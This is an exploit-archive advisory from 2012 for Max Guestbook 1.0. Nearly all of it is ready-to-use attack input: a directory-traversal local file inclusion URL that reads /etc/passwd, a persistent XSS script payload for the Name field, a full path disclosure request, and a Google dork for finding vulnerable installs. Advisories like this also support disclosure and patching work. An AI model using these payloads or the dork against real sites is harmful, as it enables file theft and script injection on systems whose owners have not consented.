[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Max Guestbook 1.0 Multiple Vulnerabilities
# Published : 2012-03-14
# Author :
# Previous Title : Persistent XSS in FlexCMS 3.2.1 for logged in users
# Next Title : OneFileCMS v.1.1.5 Local File Inclusion Vulnerability


# Exploit Title: Maxs Guestbook
# Google Dork: "Powered by PHP F1"
# Date: 14/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://www.phpf1.com/download.html?dl=18
# Version: 1.0
# Tested on:  Windows 7 / Linux(Ubuntu)


+[-- LFI --]+

http://localhost/max/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd%00

+[-- Persistent XSS --]+

Vulnerable Field = "Name"
Payload syntax: <script>alert('hello')</script>

+[-- FPD --]+

http://localhost/max/index.php?page[]=2

+[-- Shoutz --]+

All the belegit crew..